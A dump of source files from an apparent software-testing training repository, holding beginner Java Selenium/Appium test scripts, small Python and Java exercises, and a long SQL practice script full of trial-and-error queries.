"content_id": "effac1eb06580b0076ff49cd7ba64bc4e4c3b083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 446, "license_type": "no_license", "max_line_length": 45, "num_lines": 23, "path": "/Activity2.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_32;\r\n\r\nimport java.util.HashSet;\r\n\r\npublic class Activity2 {\r\n\t\r\n\t\tpublic static void main(String [] args) {\r\n\t\t\tHashSet<String> hs =new HashSet<String>();\r\n\t\t\ths.add(\"S\");\r\n\t\t\ths.add(\"P\");\r\n\t\t\ths.add(\"Q\");\r\n\t\t\ths.add(\"R\");\r\n\t\t\ths.add(\"T\");\r\n\t\t\ths.add(\"M\");\r\n\t\t\tSystem.out.println(hs);\r\n\t\t\tSystem.out.println(hs.size());\r\n\t\t\ths.remove(\"S\");\r\n\t\t\tSystem.out.println(hs.contains(\"S\"));\r\n\t\t\tSystem.out.println(hs);\r\n\t\t\t\r\n\t\t}\r\n\t\t\r\n}\r\n" }, { "alpha_fraction": 0.707355260848999, "alphanum_fraction": 0.7183098793029785, "avg_line_length": 33.5, "blob_id": "5d9f86ba4e625d87ff0cfe1fe41cf3349bf9e8ac", "content_id": "20b7e7d4cb0242cb9b6aed42af10c2c1933eee0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1278, "license_type": "no_license", "max_line_length": 97, "num_lines": 36, "path": "/Activity_2_calculator.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "import java.io.IOException;\r\nimport java.net.MalformedURLException;\r\nimport java.net.URL;\r\nimport java.util.concurrent.TimeUnit;\r\n\r\nimport org.openqa.selenium.remote.DesiredCapabilities;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterTest;\r\nimport org.testng.annotations.BeforeTest;\r\nimport org.testng.annotations.Test;\r\n\r\nimport io.appium.java_client.AppiumDriver;\r\nimport io.appium.java_client.MobileElement;\r\nimport io.appium.java_client.android.*;\r\npublic class Activity_2_calculator {\r\n\t@Test\r\n\tpublic void calc() throws InterruptedException,IOException\r\n\t{ \r\n\t\tDesiredCapabilities cap=new DesiredCapabilities();\r\n\t\tcap.setCapability(\"devicename\", \"Pixel 4_surbhi\");\r\n\t\tcap.setCapability(\"platformName\", \"Android\");\r\n cap.setCapability(\"appPackage\", \"com.android.calculator2\");\r\n cap.setCapability(\"appActivity\", \"com.android.calculator2.Calculator\");\r\n AppiumDriver<MobileElement> driver=null;\r\n try {\r\n \tdriver = new AndroidDriver<MobileElement>(new URL(\"http://127.0.0.1:4723/wd/hub\"), cap);\r\n \tSystem.out.println(\"Calculator is open\");\r\n } catch (MalformedURLException e) {\r\n System.out.println(e.getMessage());\r\n }\r\n\t}\r\n\t\r\n\t\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7099307179450989, "alphanum_fraction": 0.7260969877243042, "avg_line_length": 41.29999923706055, "blob_id": "46fc84efcdaaef3ff8897cef64a9c5e5eb99791b", "content_id": "1564f40e25771da394ea23bfbd355912e98efa4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2165, "license_type": "no_license", "max_line_length": 139, "num_lines": 50, "path": "/Project_8.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Project_8;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.openqa.selenium.interactions.Action;\r\nimport org.openqa.selenium.interactions.Actions;\r\nimport org.openqa.selenium.support.ui.Select;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterClass;\r\nimport org.testng.annotations.AfterMethod;\r\nimport org.testng.annotations.BeforeClass;\r\nimport org.testng.annotations.BeforeMethod;\r\nimport org.testng.annotations.Test;\r\n\r\npublic class Project_8 {\r\n\tWebDriver driver;\r\n\t@BeforeClass\r\n\tpublic void beforeMethod()\r\n\t{\r\n\t\tdriver=new FirefoxDriver();\r\n\t\tdriver.get(\"http://alchemy.hguy.co/crm\");\r\n\t}\r\n\t@Test\r\n\tpublic void Accounts() throws InterruptedException\r\n\t{ \r\n\t\tWebElement ele1=driver.findElement(By.id(\"user_name\"));\r\n\t\tWebElement Pass1=driver.findElement(By.id(\"username_password\"));\r\n\t\tele1.sendKeys(\"admin\");\r\n\t\tPass1.sendKeys(\"pa$$w0rd\");\r\n\t\tdriver.findElement(By.id(\"bigbutton\")).click();\r\n\t\t//Thread.sleep(10000);\r\n\t\tActions action1=new Actions(driver);\r\n\t\tWebElement accounts=driver.findElement(By.xpath(\"//a[text()='Sales']\"));\r\n\t\taction1.moveToElement(accounts).moveToElement(driver.findElement(By.xpath(\"//a[@id='moduleTab_9_Accounts']\"))).click().build().perform();\r\n\t\tThread.sleep(5000);\r\n\t\tSystem.out.println(\"Loaded\");\r\n\t\tSystem.out.println(\"Name of the members are :-\");\r\n\t\tWebElement e=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[1]/td[7]\"));\r\n\t\tSystem.out.println(e.getText());\r\n\t\tWebElement e1=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[3]/td[7]\"));\r\n\t\tSystem.out.println(e1.getText());\r\n\t\tWebElement e2=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[5]/td[7]\"));\r\n\t\tSystem.out.println(e2.getText());\r\n\t\tWebElement e3=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[7]/td[7]\"));\r\n\t\tSystem.out.println(e.getText());\r\n\t\tWebElement e4=driver.findElement(By.xpath(\"//table[contains(@class,'responsive')]/tbody/tr[9]/td[7]\"));\r\n\t\tSystem.out.println(e4.getText());\r\n}\t\t\r\n}\r\n" }, { "alpha_fraction": 0.4488188922405243, "alphanum_fraction": 0.4724409580230713, "avg_line_length": 15, "blob_id": "0adce82cee3f671752a9f848de35292f594a510b", "content_id": "6851347473e6dc1e7a5df9c0c657c5d9206b6ed2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 30, "num_lines": 7, "path": "/Recursiveadder.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "def Recfunc(N):\r\n if N:\r\n return( N+Recfunc(N-1))\r\n else :\r\n return 0\r\nres=Recfunc(6)\r\nprint (res)\r\n " }, { "alpha_fraction": 0.6729065775871277, "alphanum_fraction": 0.730904221534729, "avg_line_length": 26.255125045776367, "blob_id": "db5d93ea2c5ee46e337f4ff58aa5da84ab6e64f6", "content_id": "f86e6a2e8535a29d6699b3a10aa4d816f5cc669d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 11966, "license_type": "no_license", "max_line_length": 99, "num_lines": 439, "path": "/sqlscript (2).sql", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "select * from orders ;\n\ncreate table orders ( \norder_no int primary key , \npurchase_amount float , \norder_date date, \ncustomer_id int , \nSalesman_id int);\n\ninsert all \ninto orders values(70007,150.5,TO_DATE('2012/10/05','YYYY/MM/DD'),3002,5001) \ninto orders values(70005,270.5,TO_DATE('2012/08/17','YYYY/MM/DD'),3009,5003) \ninto orders values(70011,75.25,TO_DATE('2012/08/17','YYYY/MM/DD'),3009,5003) \nSELECT 1 FROM DUAL ;\n\nselect * from orders;\n\nselect * from orders \nwhere Purchase_Amount>500;\n\nselect * from orders \nwhere 1000<=Purchase_amount<=2000;\n\ninsert all \ninto orders values(70007,150.5,TO_DATE('2012/10/05','YYYY/MM/DD'),3002,5001) \ninto orders values(70005,270.5,TO_DATE('2012/08/17','YYYY/MM/DD'),3009,5003) \ninto orders values(70011,75.25,TO_DATE('2012/08/17','YYYY/MM/DD'),3009,5003) \nSELECT 1 FROM DUAL \n \nselect * from orders;\n\nselect * from orders \nwhere Purchase_Amount>500;\n\nselect * from orders \nwhere 1000<=Purchase_amount and Purchase_amount <=2000;\n\nselect * from orders \nwhere 1000<=Purchase_amount and Purchase_amount <=2000;\n\nselect * from orders;\n\nselect sum(purchase_amount) from orders;\n\nselect avg(purchase_amount) from orders;\n\nselect Max(purchase_amount) from orders;\n\nselect min(purchase_amount) from orders;\n\nselect count(distinct salesman_id) from orders;\n\nselect * from orders;\n\nDescribe orders\n\n\nselect customer_id,max(purchase_amount) from orders group by customer_id;\n\nselect salesman_id , order_date max(Purchase_amount) as Max_amount from orders \nwhere order_date =To_date('2012/08/17','YYYY/MM/DD') \ngroup by salesman_id , order_date ;\n\nselect salesman_id , order_date max(Purchase_amount) as \"Max_amount\" \nfrom orders \nwhere order_date =To_date('2012/08/17','YYYY/MM/DD') \ngroup by salesman_id , order_date ;\n\nselect * from orders;\n\nselect salesman_id , order_date max(Purchase_amount) as \"Max_amount\" \nfrom orders \nwhere order_date =To_date('2012/08/17','YYYY/MM/DD') \ngroup by salesman_id , order_date ;\n\nselect salesman_id , order_date, max(Purchase_amount) as \"Max_amount\" \nfrom orders \nwhere order_date =To_date('2012/08/17','YYYY/MM/DD') \ngroup by salesman_id , order_date ;\n\nselect customer_id , oreder_date,Max(purchase_amount) As \"Max_amount\" \nfrom orders \ngroup by customer_id , order_date \nHaving Max(purchase_amount) in (2030,3450,5760,6000);\n\nselect customer_id , order_date,Max(purchase_amount) As \"Max_amount\" \nfrom orders \ngroup by customer_id , order_date \nHaving Max(purchase_amount) in (2030,3450,5760,6000);\n\ncreate table customers( \ncustomer_id int primary key , \ncustomer_name varchar(32), \ncity varchar(20), \ngrade int , \nsalesman_id int);\n\ninsert into customers values \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(30054,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values ( \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(30054,'GZ','California',200,5002), \n(3003,'JG','London',300,5002));\n\ninsert into customers values \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(30054,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(3005,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values \n (3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(3005,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values \n(3002,'NR','New York',100,5001), \n(3007,'BD','NY',200,5001), \n(3005,'GZ','California',200,5002), \n(3003,'JG','London',300,5002);\n\ninsert into customers values \n(3002,'NR','New York',100,5001);\n\ninsert into customers values \n--(3002,'NR','New York',100,5001);\n\n(3007,'BD','NY',200,5001);\n\ninsert into customers values \n(3007,'BD','NY',200,5001);\n\ninsert into customers values \n(3005,'GZ','California',200,5002);\n\ninsert into customers values \n \n(3003,'JG','London',300,5002);\n\nselect * from customers;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customer a inner join salesman b \non a.salesman_id=b.salesman_id;\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n) \n \nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customer a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customer a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table customers( \ncustomer_id int primary key , \ncustomer_name varchar(20), \ncity varchar(20), \ngrade int , \nsalesman_id int );\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customer a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customer a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customers a \ninner join salseman b \non a.salesman_id=b.salesman_id;\n\ncreate table salesman( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table customers( \ncustomer_id int primary key , \ncustomer_name varchar(20), \ncity varchar(20), \ngrade int , \nsalesman_id int );\n\ncreate table salesman1( \nSalesman_id number, \nSalesman_name varchar2(32), \nSalesman_city varchar2(32), \ncommission Number \n);\n\ncreate table customers1( \ncustomer_id int primary key , \ncustomer_name varchar(20), \ncity varchar(20), \ngrade int , \nsalesman_id int );\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customers1 a \ninner join salseman1 b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \nb.name, \nb.commission \nfrom customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \nb.customer_name, \nb.commission \nfrom customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name , \na.city, \na.customer_name, \nb.commission \nfrom customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id;\n\nselect a.customer_name ,a.city,a.grade,b.name b.city from customers1 \na \nleft outer join \nsalesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,a.grade,b.name b.city from customers1 a \nleft outer join salesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,a.grade,b.name,b.city from \ncustomers1 a left outer join salesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,a.grade,b.name,b.salesman_city from \ncustomers1 a left outer join salesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,a.grade,b.salesman_name,b.salesman_city from \ncustomers1 a left outer join salesman1 b \non a.salesman_id=b.salesman_id \nwhere a.grade<300 \norder by a.customer_id;\n\nselect a.customer_name ,a.city,b.name b.commission from customer a \ninner join salesman b \non a.salesman_id=b.salesman_id \nwhere b.comisssion>12;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customer a \ninner join salesman b \non a.salesman_id=b.salesman_id \nwhere b.comisssion>12;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id \nwhere b.comisssion>12;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id \nwhere b.comisssion>12;\n\nselect a.customer_name ,a.city,b.name ,b.commission from customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id \nwhere b.commission>12;\n\nselect a.customer_name ,a.city,b.salesman_name ,b.commission from customers1 a \ninner join salesman1 b \non a.salesman_id=b.salesman_id \nwhere b.commission>12;\n\nselect * from orders \nwhere salesman_id =(select distinct salesman_id from orders where customer_id =3007);\n\nselect * from orders where \nsalesman_id in (select salesman_id from salesman where city='NewYork');\n\nselect * from orders where \nsalesman_id in (select salesman_id from salesman where salesman_city='NewYork');\n\nselect grade ,count(*) from customers \ngroup by grade having grade >(select avg(grade) from customers where city ='NewYOrk');\n\nselect order_no, purchase_amount, order_date ,salesman_id \nfrom orders \nwhere salesman_id in (select salesman_id from salesman where commission \n=(select MAX(commission) froma salesman );\n\nselect order_no, purchase_amount, order_date ,salesman_id \nfrom orders \nwhere salesman_id in (select salesman_id from salesman where commission \n=(select MAX(commission) from salesman );\n\nselect order_no, purchase_amount, order_date ,salesman_id \nfrom orders \nwhere salesman_id in (select salesman_id from salesman where commission \n=(select MAX(commission) from salesman ));\n\nselect customer_id ,customer_name from customers a \nwhere 1< \n(select count(*) from orders b where a.customer_id=b.customer_id) \nUnion \nselect salesman_id ,salesman_name from salesman a \nwhere 1< \n(select count(*) from orders b where a.salesman_id =b.salesman_id) \norder by customer_name;\n\nselect a.salesman_id,name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purachse_amount) from orders c where c.order_date =b.order_date) \nUNION \nselect a.salesman_id , name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\nselect a.salesman_id,salesman_name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purachse_amount) from orders c where c.order_date =b.order_date) \nUNION \nselect a.salesman_id , salesman_name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\ndescribe orders \n\n\nselect a.salesman_id,salesman_name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purchase_amount) from orders c where c.order_date =b.order_date) \nUNION \nselect a.salesman_id , salesman_name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\nwhere b.commission>12;\n\n\nselect a.salesman_id,salesman_name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purchase_amount) from orders c where c.order_date =b.order_date);\n\nselect a.salesman_id , salesman_name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\nselect a.salesman_id,salesman_name ,order_no,order_date from salesman a , orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select Max(purchase_amount) from orders c where c.order_date =b.order_date) \nUNION \nselect a.salesman_id , salesman_name ,order_no,order_date \nfrom salesman a, orders b \nwhere a.salesman_id=b.salesman_id \nand b.purchase_amount=(select min(purchase_amount) from orders c where c.order_date=b.order_date);\n\n" }, { "alpha_fraction": 0.7105517983436584, "alphanum_fraction": 0.7260406613349915, "avg_line_length": 25.810810089111328, "blob_id": "c5dad21fb8fb25a80a13bab37fc0f1a17ef7ae7b", "content_id": "46a27849d9609b5012ae5022ae693d4b9333a64e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1033, "license_type": "no_license", "max_line_length": 79, "num_lines": 37, "path": "/Class3.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "\r\n\r\npackage Selenium_activity_3;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.By.ById;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\n\r\npublic class Class3 {\r\npublic static void main (String[] args ) throws InterruptedException\r\n{\r\n\tWebDriver driver=new FirefoxDriver();\r\n\tdriver.get(\"https://www.training-support.net/selenium/simple-form\");\r\n\tString title=driver.getTitle();\r\n\tWebElement idLocator_f=driver.findElement(By.id(\"firstName\"));\r\n\tidLocator_f.sendKeys(\"Surbhi\");\r\n\tWebElement idLocator_l=driver.findElement(By.id(\"lastName\"));\r\n\tidLocator_l.sendKeys(\"BAhl\");\r\n\tWebElement idLocator_e=driver.findElement(By.id(\"email\"));\r\n\tidLocator_e.sendKeys(\"[email protected]\");\r\n\tWebElement idLocator_N=driver.findElement(By.id(\"number\"));\r\n\tidLocator_N.sendKeys(\"6284062711\");\r\n\tWebElement idLocator_b=driver.findElement(By.cssSelector(\".ui.green.button\"));\r\n\tThread.sleep(5000);\r\n\tidLocator_b.click();\r\n\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.5407801270484924, "alphanum_fraction": 0.5780141949653625, "avg_line_length": 31.294116973876953, "blob_id": "8d119d10df150859d2e27a63967a2d9e0ebf7ba2", "content_id": "6ec14f0ab1155daf2efa0864880bab534ba85a30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 66, "num_lines": 17, "path": "/class_example.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "class Car:\r\n \"This represents the car\"\r\n def __init__(self,manu,model,make,trans,color):\r\n self.manu=manu\r\n self.model=model\r\n self.make=make\r\n self.trans=trans\r\n self.color=color\r\n def acce(self):\r\n print(self.manu+\" \"+self.model+ \" \"+\"has started moving\")\r\n def stop(self):\r\n print(self.manu+\" \"+self.model+\" \"+\"has stopped moving\")\r\ncar1=Car(\"Toyota\",\"c\",\"2016\",\"Manual\",\"White\")\r\ncar2=Car(\"i10\",\"D\",\"2017\",\"Automatic\",\"Black\")\r\ncar3=Car(\"i20\",\"E\",\"2018\",\"Manual\",\"Green\")\r\ncar3.acce()\r\ncar3.stop()" }, { "alpha_fraction": 0.4896000027656555, "alphanum_fraction": 0.5296000242233276, "avg_line_length": 15.36111068725586, "blob_id": "eef1a764f6871676af40d100391c3642cae8c2de", "content_id": "e9a01e72676d5025f37e6850d0899fb09ca64fcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 625, "license_type": "no_license", "max_line_length": 54, "num_lines": 36, "path": "/Sorting_1.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package JavaActivity_4;\r\nimport java.util.Arrays;\r\npublic class Sorting_1\r\n{\r\npublic static void main (String args[]) {\r\n\tint []a={2,44,23,89,78,44,54};\r\n\tint i=1;\r\n\tint j=2;\r\n\tint temp;\r\n\tint k;\r\n\tint length1=a.length;\r\n\t\r\n\twhile(j<=length1)\r\n\t{\r\n\t\ti=1;\r\n\t\tSystem.out.println(\"i=\"+i);\r\n\t\t\r\n\t\t\tk=i+1;\r\n\t\t\t//System.out.println(\"k=\"+k);\r\n\t\t\tSystem.out.println(\"j=\"+j);\r\n\t\t\twhile(k<=j && a[k]<a[i])\r\n\t\t\t{\r\n\t\t\t\t\t\r\n\t\t\t\ta[k+1]=a[k];\r\n\t\t\t\r\n\t\t\t//k=k+1;\r\n\t\t\t\t}\r\n\t\tk=k+1;\r\n\t\tSystem.out.println(\"kdown=\"+k);\r\n\t\tSystem.out.println(\"Result=:\"+(Arrays.toString(a)));\r\n\t\t\t\r\n\t\t\t}\r\n\t\t\tj=j+1;\r\n\t}\r\n\tSystem.out.println(Arrays.toString(a));\r\n}\r\n" }, { "alpha_fraction": 0.6224328875541687, "alphanum_fraction": 0.6271721720695496, "avg_line_length": 19.100000381469727, "blob_id": "c72f583e775e55405be46d8bb6a4bc9d9065c030", "content_id": "198f692ad0264fcb5e7a97db3f771acf8a15b205", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 633, "license_type": "no_license", "max_line_length": 52, "num_lines": 30, "path": "/class_activity1.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Activity_3;\r\nimport java.util.ArrayList;\r\n\r\npublic class class_activity1 {\r\n\tpublic static void main(String [] args) {\r\n\t\tArrayList<String> strlist=new ArrayList<String>();\r\n\t\tstrlist.add(\"Surbhi\");\r\n\t\tstrlist.add(\"Rehanshi\");\r\n\t\tstrlist.add(\"Ankush\");\r\n\t\tstrlist.add(\"Priya\");\r\n\t\tstrlist.add(\"Shreya\");\r\n\t\tSystem.out.println(strlist.get(3));\r\n\t\tif (strlist.contains(\"Surbhi\")==true)\r\n\t\t{\r\n\t\t\tSystem.out.println(\"Its there\");\r\n\t\t\r\n\t\t}\r\n\t\telse {\r\n\t\t\tSystem.out.println(\"Its not there\");\r\n\t\t}\r\n\t\t\r\n\t\tSystem.out.println(strlist.size());\r\n\t\tstrlist.remove(\"Surbhi\");\r\n\t\tSystem.out.println(strlist.size());\r\n\t\t\r\n\t}\r\n\t\r\n\t\t\r\n\t\r\n}\r\n" }, { "alpha_fraction": 0.7160611748695374, "alphanum_fraction": 0.7265774607658386, "avg_line_length": 25.526315689086914, "blob_id": "7cf5cb105df1013d41940fa18e55de1032c37bff", "content_id": "b3657490d65af71cc2307fa50cb9f8ed62ff2375", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1046, "license_type": "no_license", "max_line_length": 84, "num_lines": 38, "path": "/Project_6.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Project_6;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterMethod;\r\nimport org.testng.annotations.BeforeClass;\r\nimport org.testng.annotations.BeforeMethod;\r\nimport org.testng.annotations.Test;\r\npublic class Project_6 {\r\nWebDriver driver;\r\n@BeforeMethod\r\npublic void Beforeclass()\r\n{\r\n\t\tdriver=new FirefoxDriver();\r\n\t\tdriver.get(\"http://alchemy.hguy.co/crm\");\r\n\t\t\r\n}\r\n@Test\r\npublic void activity_menu()\r\n{\r\n\tWebElement ele1=driver.findElement(By.id(\"user_name\"));\r\n\tWebElement Pass1=driver.findElement(By.id(\"username_password\"));\r\n\tele1.sendKeys(\"admin\");\r\n\tPass1.sendKeys(\"pa$$w0rd\");\r\n\tdriver.findElement(By.id(\"bigbutton\")).click();\r\n\t//driver.switchTo().frame(0);\r\n\tBoolean class1=driver.findElement(By.xpath(\"//a[@id='grouptab_3']\")).isDisplayed();\r\n\tSystem.out.println(\"Boolean value=\"+class1);\r\n\tif (class1==true)\r\n\t{driver.close();}\r\n\t\r\n\t\r\n\t}\r\n\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7167680263519287, "alphanum_fraction": 0.7202432751655579, "avg_line_length": 42.269229888916016, "blob_id": "c50faa53567c675b0bb78f4828e6e007342c0792", "content_id": "7818efbbd4f85c998df28b4cad17503bc1c47838", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1151, "license_type": "no_license", "max_line_length": 114, "num_lines": 26, "path": "/Class_7_2.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Package7_2;\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.By.ById;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.openqa.selenium.support.ui.ExpectedConditions;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\n\r\npublic class Class_7_2 {\r\n\tpublic static void main(String args[])\r\n\t{\r\n\t\tWebDriver driver=new FirefoxDriver();\r\n\t\tdriver.get(\"https://training-support.net/selenium/dynamic-attributes\");\r\n\t\tdriver.findElement(By.xpath(\"//input[contains(@class,'-username')]\")).sendKeys(\"surbhi\");\r\n\t\tdriver.findElement(By.xpath(\"//input[contains(@class,'-password')]\")).sendKeys(\"bahl1234\");\r\n\t\tdriver.findElement(By.xpath(\"//label[text() = 'Confirm Password']/following::input\")).sendKeys(\"bahl1234\");;\r\n\t\tdriver.findElement(By.xpath(\"//label[contains(text(), 'mail')]/following-sibling::input\")).sendKeys(\"[email protected]\");;\r\n\t\t\r\n\t\tdriver.findElement(By.xpath(\"//button[contains(text(),'Sign Up')]\")).click();\r\n\t\tString text=driver.findElement(By.id(\"action-confirmation\")).getText();\r\n\t\tSystem.out.println(\"Text=\"+text);\r\n\t}\r\n\t\r\n\r\n}\r\n" }, { "alpha_fraction": 0.5272727012634277, "alphanum_fraction": 0.5878787636756897, "avg_line_length": 18.875, "blob_id": "77cb67f2a7c3eb07aea77a3b277e49d64d769955", "content_id": "f6f35ed849fbef638d6b90c7aa48e50c3f61ab26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 165, "license_type": "no_license", "max_line_length": 26, "num_lines": 8, "path": "/addinglistnumbers.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "def sum1(numbers):\r\n sum_i=0\r\n for number in numbers:\r\n sum_i=sum_i+number\r\n return sum_i\r\nlist=[1,2,3,4,5]\r\nsum1=sum1(list)\r\nprint(\"Sum=\"+str(sum1))" }, { "alpha_fraction": 0.6954314708709717, "alphanum_fraction": 0.7069681882858276, "avg_line_length": 28.492958068847656, "blob_id": "c530a2fa134997b4f5dcb8a5859c1bcec20cd0cf", "content_id": "709621098ef1a18bf6b35d32c077d0da76578bb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2167, "license_type": "no_license", "max_line_length": 121, "num_lines": 71, "path": "/TestNG_5.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package TestNG_5;\r\n\r\nimport org.openqa.selenium.By;\r\nimport org.openqa.selenium.WebDriver;\r\nimport org.openqa.selenium.WebElement;\r\nimport org.openqa.selenium.firefox.FirefoxDriver;\r\nimport org.testng.Assert;\r\nimport org.testng.annotations.AfterClass;\r\nimport org.testng.annotations.AfterTest;\r\nimport org.testng.annotations.BeforeClass;\r\nimport org.testng.annotations.Test;\r\nimport org.openqa.selenium.support.ui.ExpectedConditions;\r\nimport org.openqa.selenium.support.ui.Wait;\r\nimport org.openqa.selenium.support.ui.WebDriverWait;\r\n\r\npublic class 